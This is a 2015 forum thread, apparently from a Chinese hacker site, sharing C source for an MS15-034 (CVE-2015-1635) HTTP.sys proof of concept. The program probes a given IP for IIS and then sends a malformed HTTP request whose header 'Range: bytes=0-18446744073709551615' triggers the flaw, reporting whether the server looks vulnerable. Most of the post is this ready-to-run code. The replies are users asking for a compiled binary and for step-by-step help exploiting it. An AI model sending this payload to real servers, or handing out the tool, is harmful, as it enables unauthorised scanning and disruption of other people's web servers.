MS15-034 PoC HTTP.sys

90_ · 发表于 2015-4-16 17:31:56

CVE: 2015-1635

[C] 纯文本查看 复制代码

/*
 UNTESTED - MS15-034 Checker
    
 THE BUG:
  
    8a8b2112 56              push    esi
    8a8b2113 6a00            push    0
    8a8b2115 2bc7            sub     eax,edi
    8a8b2117 6a01            push    1
    8a8b2119 1bca            sbb     ecx,edx
    8a8b211b 51              push    ecx
    8a8b211c 50              push    eax
    8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
  
    ORIGNAL POC: [url]http://pastebin.com/raw.php?i=ypURDPc4[/url]
  
    BY: [email]john.b.hale@gmai.com[/email]
    Twitter: @rhcp011235
*/
  
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <arpa/inet.h> 
  
int connect_to_server(char *ip)
{
    int sockfd = 0, n = 0;
  
     struct sockaddr_in serv_addr;
     struct hostent *server;
  
    if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        {
            printf("\n Error : Could not create socket \n");
            return 1;
        }
  
    memset(&serv_addr, '0', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
        serv_addr.sin_port = htons(80);
    if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)
        {
            printf("\n inet_pton error occured\n");
            return 1;
        }
    if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
        {
            printf("\n Error : Connect Failed \n");
            return 1;
        } 
  
    return sockfd;
}
      
  
int main(int argc, char *argv[])
{
    int n = 0;
    int sockfd;
    char recvBuff[1024];
  
    // Check server
    char request[] = "GET / HTTP/1.0\r\n\r\n";
  
    // our evil buffer
    char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
  
  
    if(argc != 2)
    {
        printf("\n Usage: %s <ip of server> \n",argv[0]);
        return 1;
    } 
  
    printf("[*] Audit Started\n");
    sockfd = connect_to_server(argv[1]);
    write(sockfd, request, strlen(request)); 
    read(sockfd, recvBuff, sizeof(recvBuff)-1);
  
    if (!strstr(recvBuff,"Microsoft"))
    {
        printf("[*] NOT IIS\n");
        exit(1);
    }
  
    sockfd = connect_to_server(argv[1]);
    write(sockfd, request1, strlen(request1));
    read(sockfd, recvBuff, sizeof(recvBuff)-1);
    if (strstr(recvBuff,"Requested Range Not Satisfiable"))
    {
                printf("[!!] Looks VULN\n");
                exit(1);
    } else if(strstr(recvBuff,"The request has an invalid header name")) {
    printf("[*] Looks Patched");
} else
    printf("[*] Unexpected response, cannot discern patch status");
      
  
          
  
}
 
[2015-04-16]  #

a197110 · 发表于 2015-4-16 18:52:06

沙发马上去试试

a197110 · 发表于 2015-4-16 19:21:42

求一份编译完的

2863482451 · 发表于 2015-4-18 02:47:18

这个漏洞编译好了，怎么利用？小白求详细过程

a197110 · 发表于 2015-4-18 07:50:36

2863482451 发表于 2015-4-18 02:47
这个漏洞编译好了，怎么利用？小白求详细过程

发给我可好

小龙 · 发表于 2015-6-28 02:15:52

还是不错的哦，顶了

fkqqxx · 发表于 2015-6-28 04:36:25

2863482451 发表于 2015-4-18 02:47
这个漏洞编译好了，怎么利用？小白求详细过程

这是C语言代码么

Micah · 发表于 2015-6-29 00:33:26

还是不错的哦，顶了

HUC-参谋长 · 发表于 2015-6-29 11:47:05

还是不错的哦，顶了

borall · 发表于 2015-6-30 00:19:21

支持中国红客联盟(ihonker.org)

MS15-034 PoC HTTP.sys

点评

指导单位

旗下站点

联系我们